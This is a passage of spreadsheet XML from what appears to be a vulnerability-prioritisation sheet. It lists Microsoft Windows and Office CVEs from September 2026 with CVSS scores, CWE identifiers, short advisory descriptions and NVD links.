      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L301" s="5" t="inlineStr">
        <is>
          <t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69601</t>
        </is>
      </c>
      <c r="C302" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E302" s="5" t="inlineStr"/>
      <c r="F302" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G302" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L302" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69603</t>
        </is>
      </c>
      <c r="C303" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E303" s="5" t="inlineStr"/>
      <c r="F303" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G303" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L303" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69614</t>
        </is>
      </c>
      <c r="C304" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E304" s="5" t="inlineStr"/>
      <c r="F304" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G304" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H304" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-20</t>
        </is>
      </c>
      <c r="L304" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69628</t>
        </is>
      </c>
      <c r="C305" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E305" s="5" t="inlineStr"/>
      <c r="F305" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G305" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L305" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69629</t>
        </is>
      </c>
      <c r="C306" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E306" s="5" t="inlineStr"/>
      <c r="F306" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G306" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H306" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L306" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69632</t>
        </is>
      </c>
      <c r="C307" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E307" s="5" t="inlineStr"/>
      <c r="F307" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G307" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H307" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L307" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69649</t>
        </is>
      </c>
      <c r="C308" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E308" s="5" t="inlineStr"/>
      <c r="F308" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G308" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="C309" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E309" s="5" t="inlineStr"/>
      <c r="F309" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G309" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69671</t>
        </is>
      </c>
      <c r="C310" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E310" s="5" t="inlineStr"/>
      <c r="F310" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G310" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H310" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L310" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69676</t>
        </is>
      </c>
      <c r="C311" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E311" s="5" t="inlineStr"/>
      <c r="F311" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G311" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L311" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69678</t>
        </is>
      </c>
      <c r="C312" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E312" s="5" t="inlineStr"/>
      <c r="F312" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G312" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H312" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L312" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69686</t>
        </is>
      </c>
      <c r="C313" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E313" s="5" t="inlineStr"/>
      <c r="F313" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G313" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H313" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L313" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69712</t>
        </is>
      </c>
      <c r="C314" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E314" s="5" t="inlineStr"/>
      <c r="F314" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G314" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L314" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="C315" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E315" s="5" t="inlineStr"/>
      <c r="F315" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G315" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H315" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L315" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69722</t>
        </is>
      </c>
      <c r="C316" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E316" s="5" t="inlineStr"/>
      <c r="F316" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G316" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H316" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="C317" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E317" s="5" t="inlineStr"/>
      <c r="F317" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G317" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H317" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L317" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69729</t>
        </is>
      </c>
      <c r="C318" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E318" s="5" t="inlineStr"/>
      <c r="F318" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G318" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L318" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69740</t>
        </is>
      </c>
      <c r="C319" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E319" s="5" t="inlineStr"/>
      <c r="F319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G319" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L319" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69742</t>
        </is>
      </c>
      <c r="C320" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E320" s="5" t="inlineStr"/>
      <c r="F320" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G320" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H320" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="I320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69759</t>
        </is>
      </c>
      <c r="C321" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E321" s="5" t="inlineStr"/>
      <c r="F321" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G321" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H321" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69764</t>
        </is>
      </c>
      <c r="C322" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E322" s="5" t="inlineStr"/>
      <c r="F322" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G322" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H322" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L322" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69767</t>
        </is>
      </c>
      <c r="C323" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E323" s="5" t="inlineStr"/>
      <c r="F323" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G323" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H323" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69772</t>
        </is>
      </c>
      <c r="C324" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E324" s="5" t="inlineStr"/>
      <c r="F324" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G324" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr">
        <is>
